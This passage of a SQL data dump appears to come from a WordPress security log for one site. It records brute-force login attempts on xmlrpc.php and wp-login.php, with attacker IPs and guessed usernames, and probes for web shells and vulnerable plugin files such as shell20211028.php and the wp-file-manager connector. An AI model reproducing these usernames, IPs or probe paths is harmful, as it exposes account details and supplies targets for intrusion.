.33',1364735265,'newd',0,1664377039.8979,152,'wfnr2vSCU9oeK6NQD0WGdhJ8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('41.78.241.66',693039426,'newd',0,1664377043.9867,152,'467VEqGinPaU3csMjh9mtx8v','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.85',3583549781,'joyce',0,1664392420.9550,152,'AxdPCWJEIqL5NXG9ZzRYs8Hj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.78.47.249',2471374841,'',0,1664392789.0619,55,'BYH9LgkKShDZOl4tF5Q7NCXU','','19|0|0|0|cteisys.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('36.92.166.178',610051762,'newd',0,1664393716.3334,152,'pFoV3rcJBZY64UmOkstzjGLS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664393722.9066,152,'jEnTgDVmC5yBXK2F6c73vpW8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.202.117.198',1959425478,'newd',0,1664393723.0995,152,'SfwAeR6UGx5qu7riJCoyTvBH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664393726.8805,152,'ZLN1IS6BGWjuXQqzExdabetV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664393736.3092,152,'wmh64VbWSGu23KLkOsUA0i1Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.37.156.2',908434434,'newd',0,1664393740.7039,152,'gc3alnzQjEHbMWu8eKUJSvCm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.152.170.96',1738058336,'newd',0,1664393746.8807,152,'JzwABb0mFt4yCLMZGHdxRVi3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.205.144',1109511568,'newd',0,1664393758.2977,152,'ou8p1eGzqvU74N0RMQOcYhIP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.195.254.123',3351510651,'nathaniel-lipka',0,1664395523.9409,51,'2vPZAxgouJq1M5R9FNHC6KET','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.140.71.65',2777433921,'newd',0,1664395920.4767,152,'noqTXWCOAfl9Js78NeUgZPFt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.234.92.73',1055546441,'newd',0,1664395925.2416,152,'lqPngE3Th6sf2AL1Ovz4ryHM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.111.174.159',57650847,'newd',0,1664395927.9283,152,'dLyHfm1l2NuIRcsJkn9O6aX8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.163.146.52',1503892020,'newd',0,1664395938.4790,152,'LHrTbl4mKdSCQzuxIjf83kZ7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.107.98',1496214370,'newd',0,1664395946.0229,152,'veaiS0l46cosxwAmCNIfQR9V','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.117.247.34',1467348770,'newd',0,1664395948.6751,152,'vdyBPTmZaV4Qg80DG1if3o9H','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.153.25.22',731453718,'newd',0,1664397025.2457,152,'C8jkUpPbOTYRAzosI6GtHcau','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664397025.2898,152,'koLpJQ5flGPZAUrRD3smCguw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.184.141',2806495373,'newd',0,1664397025.4095,152,'Z3NWledALTK7maouijnXMDP8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.78.33.115',3276677491,'newd',0,1664397040.5608,152,'ehWl1b0jucFGXCOdpoPtziM2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.235.66.248',1844134648,'newd',0,1664397045.3791,152,'5r4Ely7RgBGL3QaXCWU62FZq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.195.166',2160575398,'newd',0,1664397051.8459,152,'q8hHdGokZwm0AbefCRztu9yB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.107.98',1496214370,'newd',0,1664397067.2385,152,'5Z2kzTSLlf9xXoWnHVK3d7MI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('160.16.210.199',2685457095,'newd',0,1664397068.9218,152,'AhboMq0DdlpEIGBewF5ugn2C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.89.196.13',2556019725,'',0,1664397625.8750,55,'ANH6kezh5brTXDYCcnjuMgKZ','','19|0|0|0|cteisys.com/wp-content/class-index-wordpress.php',0,19,0),('209.141.48.210',3515691218,'Joyce',0,1664398671.6618,51,'tTQ61Xm8y2PwhR0JdbD9ro5e','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.102.28.107',1382423659,'joyce',0,1664399194.7061,152,'VlBQcUj0okDXHSEazIhG4swF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('129.226.11.117',2179074933,'newd',0,1664400692.9488,152,'obsrAS2ONEHQa9d1FxXvmg5k','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664400692.9575,152,'dy9YusXmkTUtCJ3LDElzh50P','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.228.130',861529218,'newd',0,1664400692.9566,152,'8MdvFtE5blCGVpQOI3ZWB7Hh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.62.177.214',842969558,'newd',0,1664400695.5888,152,'w2MpNan6tGkPbOiZX5Uxhyjz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.107.98',1496214370,'newd',0,1664400701.3808,152,'EvSWAhUaXOHzr0dNqMe8m3u4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.102.88.47',3110492207,'newd',0,1664400701.7939,152,'2YBOilogXP5nkZ47CF3jdzK9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664400707.3169,152,'1672VuXIM0RjgiwOQxysEtJC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.184.141',2806495373,'newd',0,1664400709.8813,152,'2DTcxj8swgRoqEX4MJyVFpel','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.103.221.24',1567087896,'newd',0,1664400724.9541,152,'qLd9NGPhVvIC1AegrwpxJtcu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664400741.2964,152,'N0E8CK1BitGVIQpb7UckX35v','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('57.128.45.42',964701482,'',0,1664402287.7381,55,'4VzUYmAu6bO8orfiIGX3tywK','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('57.128.45.42',964701482,'',0,1664402301.1506,55,'yFBIEPTp1QnKtXjcYAWOuz2D','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('57.128.45.42',964701482,'',0,1664402305.9241,55,'dmYcT4fG0VzOipQ3lCErKUbt','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('57.128.45.42',964701482,'',0,1664402315.1517,55,'D6Jjhn8mYAI01xKd9uiyNFTZ','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('51.89.228.130',861529218,'newd',0,1664402750.7207,152,'E2GnZVIOTocs3PrfhKm5pN6d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.78.33.115',3276677491,'newd',0,1664402750.7204,152,'6dZvbXiD7CQ4yOjpuwPIkzht','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.147.151',2160563095,'newd',0,1664402751.9170,152,'Oj9Mn2g8XtKP7YmBGIdfrSxJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.152.170.96',1738058336,'newd',0,1664402768.3276,152,'1XUfz2syOKcVgu3SvCaixoE6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.195.166',2160575398,'newd',0,1664402771.9569,152,'w1kPZVglGUNCYWTn87sDIEoz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.210.84.161',3000128673,'newd',0,1664402781.3817,152,'bh3FK2dvBLARQpXi9W7zejwu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.195.166',2160575398,'newd',0,1664402782.4401,152,'WrPYZXuLjChcMxDSI1RaElFk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.32.113.107',757100907,'newd',0,1664402783.3841,152,'ZFMT6vL4WcKAPYhGHO2uljeC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('86.105.9.67',1449724227,'joyce',0,1664404164.4828,152,'PEdaclkzTC97g2O68SKFQ0iH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.104',3583550056,'joyce',0,1664404400.6190,152,'YmNu49kxd6JUsh0AVzflw2Lj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664405319.9476,152,'SFMiUqx1f5CIgnJVNbO9KEPe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.86.198',1386567366,'newd',0,1664405334.1768,152,'ZEFW3Bo5l7Mser6TwpQyahVd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.9.113.101',2953408869,'newd',0,1664405853.4643,152,'XzMHvcubTWxjs0tEadlnkZrI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('133.18.25.1',2232555777,'newd',0,1664405868.5905,152,'1YzHxU40BbX5pdaTfu8ktwjc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.195.104.87',868444247,'newd',0,1664405869.3276,152,'kzUPYKtna3SMjX0iBDAT8VIv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.209.69.158',886130078,'newd',0,1664405883.9968,152,'Q6Zv5VCPYOSRIj1yExT0f8dX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.153.25.22',731453718,'newd',0,1664405884.5203,152,'Vw2zpOP3MAYE4Xe6xslTHjLJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.33',1364735265,'newd',0,1664407320.6612,152,'20hzti17Zj3pBTXYgsFEnUbk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664407320.6601,152,'AHj2iEByeT078mZStNd1Gbzu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664407320.6650,152,'j5MISrblsKeEkoyDGqVi9c12','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.33',1364735265,'newd',0,1664407326.4029,152,'vHJzm1r3PwfTRbi498UjOaQu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.62.177.214',842969558,'newd',0,1664407328.6238,152,'OtEYZVAigcfF7rQHwoDk31T4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.232.31',2487805983,'newd',0,1664407339.2029,152,'lv47xhXEtP9ybYKDJcGMjIw1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.153.25.22',731453718,'newd',0,1664407339.6638,152,'hzXlFLEO8w0dVcxQ2aq3UBf6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664407347.1814,152,'LjMSJdfWN13qrcItblT6eR9w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.147.151',2160563095,'newd',0,1664407348.0511,152,'gYAOqbyEena2GMiBJ814kC3R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.241.3.166',804324262,'newd',0,1664409242.4577,152,'DVIvi6KXL3SkMZutmbs4zaAn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.252.235',3488939243,'newd',0,1664409245.6162,152,'Gyb6c04rCvKfN3J8xHQ2RtLq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.8.12.105',1728580713,'newd',0,1664409255.3220,152,'4Et1MF72YhfQOIplcLgSbKGe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.169.34.239',1739137775,'newd',0,1664409255.7179,152,'3T56RGd4UuM1jXzOSireJInQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.170',3110826154,'newd',0,1664409260.2893,152,'tCYk6XhQEG9Sjde18LzpyoPU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.62.177.214',842969558,'newd',0,1664409260.5943,152,'52Ms9qTZGgOr3Hn1RAaJNwLv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.116.131.148',2306114452,'newd',0,1664409262.6258,152,'WFkoURfm4DxqSdEvrNuTPpi5','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('115.78.160.53',1934532661,'newd',0,1664409263.3358,152,'40nBMydrH61wEOWcNjslFVuq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.116.131.148',2306114452,'newd',0,1664409264.3625,152,'rP7N6eIsk1uO5JazVRyxnDY2','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('212.91.94.100',3562757732,'newd',0,1664409268.0356,152,'N7qnlFHaXzhryIS12BORxU0p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.241.3.166',804324262,'newd',0,1664409270.6803,152,'QSKxMtm4uGFWyOk5sEvofH1d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.244.133.254',3270804990,'newd',0,1664409271.1824,152,'mJhSG5alZQACOi4Psf2o1BVb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.31.21.26',2065634586,'admin',0,1664410507.2574,152,'lmV0HMC8y4OqEjJpuF36cxId','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.121.5',3098048773,'admin',0,1664410687.6707,152,'q7oV8ilDHpXv2LtzxfOKhyME','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.235.52.36',1156264996,'joyce',0,1664411349.2654,152,'mqsZE0S8FTa9K6uAxMnfzgeO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.106.228.6',1466622982,'newd',0,1664411441.6617,152,'0Yoa8xqlU6b9BhipJwNgEjtT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.29.131.126',1109230462,'newd',0,1664412210.3212,152,'IiGMjysLDJklP348mcQK7Etz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('65.52.67.200',1093944264,'newd',0,1664412348.0454,152,'PNIdfuLRXSGkjZTm869Jhv1e','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.123.157',3098049437,'newd',0,1664412364.4381,152,'E5oRjW7uKN1phlrxLZXzkqAU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.20',1364734996,'newd',0,1664412384.2151,152,'hqHy9xAoQJ5SCrUu1IFM8WnE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664412387.6906,152,'hgqs0SGDjRUoFuk8w3CByJ6V','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664412388.4146,152,'Mb9FK1rEy2xWcaCBAl6Yspfz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.161.220.46',1503779886,'newd',0,1664412388.5884,152,'MvIFAQDGRf9d7hzbHkaYnscB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664412393.8088,152,'c7keRgGnObhABzt53I6pVCv9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.220.27',2717965339,'newd',0,1664412393.8871,152,'LsqvZpIPa2OkcfxVEFWgwRHK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('186.64.119.120',3124787064,'newd',0,1664412939.7880,152,'4NHxYa6gzyFViWbGjlSfK3RD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.93.152.83',3277690963,'newd',0,1664413555.4411,152,'AdKLu0RaN9HVCEiBIOf3j1nF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.171.181.142',1739306382,'newd',0,1664413686.0918,152,'IPXt93T61GjKfAB04lCQrEoi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664413713.8096,152,'sYzxEK1WHNLGZU0IVy7RliA6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.244.133.254',3270804990,'newd',0,1664413713.8969,152,'iQAgHq8E5YvwLkTPafSxKMI4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.58.73.254',3107604990,'newd',0,1664413726.1042,152,'1gAcHtVrx98JCe4TwsLNKPWh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('172.105.49.155',2892575131,'newd',0,1664413727.5217,152,'p0e8aKfZOzUHxhvkBAEl4tos','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.244.133.254',3270804990,'newd',0,1664413727.7263,152,'Dxgh38IKC0Sbk4YFMoeGtOLs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664413731.8092,152,'qQAbTF9Gwd1SivjKs3Cx06R2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664413735.3187,152,'bdHD5NXylfegG3WJLMkcF0TV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664413738.7089,152,'uk2Jv5TxDtGzbZOYhRIdeAVw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.205.144',1109511568,'newd',0,1664413743.2338,152,'s1hvFZxn9tyW7EORHgdCYucM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.153.25.22',731453718,'newd',0,1664413744.8829,152,'8hqRkBKU1suteS0pAEFVY2In','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.99.69.189',2338538941,'newd',0,1664414487.5995,152,'u9328mC7loYkNFKbjAXDREiS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.89.196.13',2556019725,'',0,1664414830.9633,55,'26Xwrm1hk3DbtCpz5SojesUL','','19|0|0|0|cteisys.com/wp-includes/class-wordpress-cloud.php',0,19,0),('104.254.90.243',1761499891,'joyce',0,1664415221.7360,152,'IKZHJugljLEv7DGehVa0W4C9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('38.242.205.84',653446484,'newd',0,1664415223.1760,152,'z1KHFVfan0QSRdoOrpkx5t9B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.10',3583549962,'joyce',0,1664415563.1890,152,'zjZ5lELwqtIC4hQXikmHFKA8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.239.161.138',351248778,'newd',0,1664415739.0729,152,'m87WUoZ5aMj0RGnDbNAHJ2IV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.9.113.101',2953408869,'newd',0,1664415739.2058,152,'tZFWKHblyJhgGN3AEOowP5ui','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.11.36.185',520823993,'newd',0,1664415740.5178,152,'ZaybAQPmdvlLYESojR0e9wGK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.44.60.148',2905357460,'newd',0,1664415747.4630,152,'hi2qn4YmXtvgH5ORukMWLrIe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664415761.2618,152,'Y80dNqaIxVrgc46kyB352OTh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.234.92.73',1055546441,'newd',0,1664415768.9018,152,'FwtTa0JzP6YQ5UXNokqLDfMC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.228.130',861529218,'newd',0,1664415768.9112,152,'swPihtJKj74e2uYW3cdTFlv6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.205.144',1109511568,'newd',0,1664415788.1589,152,'MZznyx4iCg136rdtXa5EpjeJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.69',3583549765,'joyce',0,1664416311.7809,152,'8hj3ecSnJ6K7zirtCbl4Dx9W','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.0.73.142',1694517646,'newd',0,1664416585.2879,152,'P4uZOhTvR3ocyS1IH9BFUaj5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.8.58.8',1997027848,'newd',0,1664416755.5401,152,'56IwN1tcfvLTGbJPVDYiakj8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.120.132.83',628655187,'joyce',0,1664417203.4754,152,'jLkxYwDPWB6q3lmR2yQdgEKX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.222.142.146',1138658962,'newd',0,1664417363.6610,152,'YJ7HLWsDbtimqBn5fgN3o8kF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'Joyce',0,1664417955.6086,51,'FJqyonuNzvTLBE3DXQO7dVeP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.194.10.231',1757547239,'newd',0,1664418154.0363,152,'mc5oe6YTlIFHKMzE4jBOCAQb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.194.233.240',599976432,'newd',0,1664418924.6242,152,'M1K3CFdPoVOAWNYHzur6vJna','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.220.27',2717965339,'newd',0,1664418945.7203,152,'ENHuJhti1wnqlWBp8zoYymMd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.37.174.38',1747299878,'newd',0,1664418946.9994,152,'qVRUFcm69MW8ZnsSL3THK4br','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664418952.3706,152,'fFj5KiN7XRStr2uVDLg3veJP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.184.141',2806495373,'newd',0,1664418955.8947,152,'eJ1fS9wKMnibhokYRZXQGN5D','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('204.93.193.216',3428696536,'newd',0,1664418957.1735,152,'9807kRXUuTijmNIKtve12HhS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('79.139.60.88',1334525016,'newd',0,1664418964.0831,152,'riLsZncBJyIlQhMezmDGxFa0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.91.94.100',3562757732,'newd',0,1664418966.8843,152,'a4XfR9UQ8LPweAbd0tk3rZoB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.239.172.7',3002051591,'newd',0,1664418970.9859,152,'uDrxpG7hZmfFVESgXPAdOc14','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664418974.8893,152,'6gDNlrumCRpAq9bXL02Bd7kH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.113.160',3110826400,'newd',0,1664418991.2916,152,'NmyOqzjltI3P5v8x7Juf9HsV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1664419129.5346,152,'OwtEyfJHMlsLVvjSBKc3Z7px','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.92.159.48',3193741104,'newd',0,1664419746.2273,152,'VUPjqz4FR601oJHhfbQe95r3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.131.4.125',58918013,'newd',0,1664419917.3427,152,'XUrJtxEFpl0vOe5s93fGnTIB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.163.146.52',1503892020,'newd',0,1664420313.7442,152,'XxlghdnJcWaZPsKFB1yLT0ti','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664420313.8816,152,'jgHOhF78a5zR4nTMvVXqxGZs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.86.198',1386567366,'newd',0,1664420313.9018,152,'b74Yiyf5T9dstwhLrj6vzU1p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.205.144',1109511568,'newd',0,1664420319.6080,152,'7dOMipoF25JQNHCh1D3esWX4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('223.165.66.70',3752149574,'newd',0,1664420321.5360,152,'8nRh0tsPGIfAZMDamy9o7pXj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.153.25.22',731453718,'newd',0,1664420325.4325,152,'i4XyCcfDZ9xtnoPblJ8gSV7w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.251.155.62',637246270,'newd',0,1664420341.0586,152,'ivLhaJgj9bHOkDFlC7xoRtuq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.249.124.141',3237575821,'newd',0,1664420345.2900,152,'nYsWTFNXtMzA4IOkeguwo93R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.176.230.188',3249596092,'newd',0,1664420717.7161,152,'5iQmbHyRqn1MdhPolCV3JwAj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.69.10',3270067466,'newd',0,1664421267.5549,152,'Mih5FNrTXoDexKQkuOAJBEd4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.115.107',2733732715,'newd',0,1664421429.3403,152,'1cDM6Hkzq9gF3eGvYyUCsLRb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.201.110.199',3351867079,'newd',0,1664421863.3726,152,'pvP5OeMD8BaIVZL749qozf6C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.38.88.250',3324401914,'newd',0,1664422361.3866,152,'12zpdPUYHk7Dyw8rqKIhbnXZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('160.16.210.199',2685457095,'newd',0,1664422398.2504,152,'WxEZrnvJMDC2eotwQO3pb8K0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('97.74.82.165',1632260773,'newd',0,1664422408.1257,152,'4pQOcMH5eytiKRqPvkxGsD12','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('222.124.3.203',3732669387,'newd',0,1664422412.2233,152,'znEuANBaOf6LW3GVoTR1Ic7r','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.61.28.93',87891037,'newd',0,1664422434.9219,152,'5YiBgQL70haVlu9jUkR8tT6D','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.210.84.161',3000128673,'newd',0,1664422435.0871,152,'SqZpBHUGA0FyRoIaOiV34rLf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('40.127.3.88',679412568,'newd',0,1664422441.4856,152,'0uRX1EKYSnWCA5g9DbUBejMG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.8.12.105',1728580713,'newd',0,1664422442.6699,152,'CxqpDFTry0bauhIXZ7RfQLYv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('186.234.80.231',3135918311,'newd',0,1664422798.3998,152,'1kcNTiF0IMf25VDuLwyY8GOS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.225.246',2733761014,'newd',0,1664422934.6760,152,'IAfUSdLrZOJVcgQiC93816v0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.89.196.13',2556019725,'',0,1664423219.4456,55,'Tlbzvq7gZHJtENRF3kSB6A04','','19|0|0|0|cteisys.com/wp-includes/class-index-wordpress.php',0,19,0),('139.99.69.189',2338538941,'newd',0,1664423233.8533,152,'ThOywkF2JeNPXBA7gCtZSbL8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.165.237.48',3584421168,'newd',0,1664423343.0960,152,'Z5knyO9leH8Ua2wBSsh7mXzY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.20.114.155',1125413531,'newd',0,1664423743.7051,152,'qV9TWybdtMBKRODHlNkcPL5j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('152.89.196.13',2556019725,'',0,1664424006.4951,55,'XGqbEiwS6FIKpcOLzoQZPj1A','','19|0|0|0|cteisys.com/wp-content/plugins/wp-members-master/widget-tag.php',0,19,0),('128.199.108.205',2160553165,'newd',0,1664424366.8996,152,'1ITHXcLhOwjWn2rCfiRoYM6Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.112.202.112',3245394544,'newd',0,1664424441.1402,152,'4yVWDqdscfgYEiSB8eGRnjz7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.102.88.47',3110492207,'newd',0,1664424562.6968,152,'qjuiOHvsP4yn2ZRl180hWCQJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664424562.7891,152,'HswNSax28uWzXIeBbD0ZJFdV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.91.94.100',3562757732,'newd',0,1664424563.0298,152,'F5PRniaK1wpMXJZEgLY9rmHo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.241.3.166',804324262,'newd',0,1664424567.82